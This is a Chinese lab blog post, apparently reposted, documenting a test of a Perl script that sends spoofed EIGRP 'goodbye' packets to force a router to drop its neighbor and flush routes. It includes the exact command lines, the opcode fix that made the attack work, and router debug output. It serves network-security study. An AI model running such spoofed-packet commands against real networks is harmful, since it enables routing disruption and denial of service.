Eigrp惡意插入路由和致癱***測試（四）

五、***eigrp方式二

1、現在我們來嘗試這個腳本的第二個參數，ipgoodbye； ./eigrp.pl --ipgoodbye 192.168.1.251 --source 192.168.1.249 嗯？路由器沒反應？ 這個腳本發出的包貌似有問題；我們來看看： 2、原來是opcaode的值不對，我們來修改下opcode的值。（水煮豆豆注：opcode意為Operation code indicating the message type: 1 Update. 2 Reserved. 3 Query. 4 Hello. 5 IPX-SAP，這里不知道為什么和現實中得到的不一致，網上很多人抓eigrp包時，opcode為5也是hello的包） ./eigrp.pl --ipgoodbye 192.168.1.251 --source 192.168.1.249 --opcode=5 成功了，又開始重新收斂了，趕緊看看數據： 很好，沒有出現unknown。注意哦，現在腳本發出來的包符合組播的地址了，不再是單播指向251的哦！這里看看里面有什么： 和正常的hello包相比，僅僅是屁股后面多了一截，然后IOS的版本不一致（這里有點奇怪，我在配置文件里已經改成12.4，且在***方法一里測試發出的包也是12.4的，這里卻怎么都是12.3，看來這里發出的數據并沒有讀取配置文件中的值）；看看兩個路由器都反應了什么信息： R0 Feb? 1 08:10:28.298: EIGRP: Received Goodbye TLV from 192.168.1.249
Feb? 1 08:10:28.298:??????? 192.168.1.251
Feb? 1 08:10:28.302:??????? address matched
Feb? 1 08:10:28.302: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is down: Peer goodbye received
Feb? 1 08:10:28.306: DUAL: linkdown: start - 192.168.1.249 via FastEthernet0/0
Feb? 1 08:10:28.314: DUAL: Destination 192.168.0.0/16
Feb? 1 08:10:28.318: DUAL: Destination 172.16.0.0/16
Feb? 1 08:10:28.322: DUAL: Find FS for dest 172.16.0.0/16. FD is 307200, RD is 307200
Feb? 1 08:10:28.322: DUAL:????? 192.168.1.249 metric 4294967295/4294967295 not found Dmin is 4294967295
Feb? 1 08:10:28.326: DUAL: Peer total 0 stub 0 template 0
Feb? 1 08:10:28.330: DUAL: Dest 172.16.0.0/16 (No peers) not entering active state.
Feb? 1 08:10:28.334: DUAL: Removing dest 172.16.0.0/16, nexthop 192.168.1.249, infosource 192.168.1.249
Feb? 1 08:10:28.338: DUAL: No routes.? Flushing dest 172.16.0.0/16
Feb? 1 08:10:28.338: DUAL: linkdown: finish （R0收到了Goodbye包，并識別同時配合關閉路由選擇） R1 Feb? 1 08:10:28.264: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 69, rcvd 2
Feb? 1 08:10:28.272: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb? 1 08:10:28.276:?? AS 1, Flags 0x0, Seq 0/0 idbQ 0/0
Feb? 1 08:10:28.276: EIGRP: Packet from ourselves ignored （R1也收到了Goodbye包，忽略） …… Feb? 1 08:10:32.907: IP: tableid=0, s=192.168.1.251 (FastEthernet0/0), d=192.168.1.249 (FastEthernet0/0), routed via RIB
Feb? 1 08:10:32.907: IP: s=192.168.1.251 (FastEthernet0/0), d=192.168.1.249 (FastEthernet0/0), len 40, rcvd 3
Feb? 1 08:10:32.915: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb? 1 08:10:32.915: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 77, rcvd 2
Feb? 1 08:10:32.919: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 40, rcvd 2
Feb? 1 08:10:32.931: EIGRP: Received UPDATE . FastEthernet0/0 nbr 192.168.1.251
Feb? 1 08:10:32.935:?? AS 1, Flags 0x1, Seq 45/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0 Feb? 1 08:10:32.939: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251 (FastEthernet0/0) is down: peer restarted
Feb? 1 08:10:32.943: DUAL: linkdown: start - 192.168.1.251 via FastEthernet0/0
Feb? 1 08:10:32.951: DUAL: Destination 192.168.0.0/16
Feb? 1 08:10:32.951: DUAL: Destination 172.16.0.0/16
Feb? 1 08:10:32.951: DUAL: Destination 172.16.0.0/24
Feb? 1 08:10:32.955: DUAL: linkdown: finish （R1收到R0的更新，得知已經關閉路由選擇，因此自己也關閉了） 3、推論。這個腳本的ipgoodbye參數確實讓R0以為收到了goodbye信息，從而引發了路由收斂，但是我們很明顯的看到，和方法一的報錯不一樣，前面是因為地址的動態變化，而這次是因為收到了確定的goodbye信息，問題在于這個goodbye包并不是權值255的包，一樣做了有效的處理。 為了驗證這一點，我們需要進一步修改實驗拓撲，測試如何在不使用腳本的情況下觸發更新。

轉載于:https://blog.51cto.com/netwalk/128213

總結

以上是生活随笔為你收集整理的Eigrp恶意插入路由和致瘫***测试（四）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。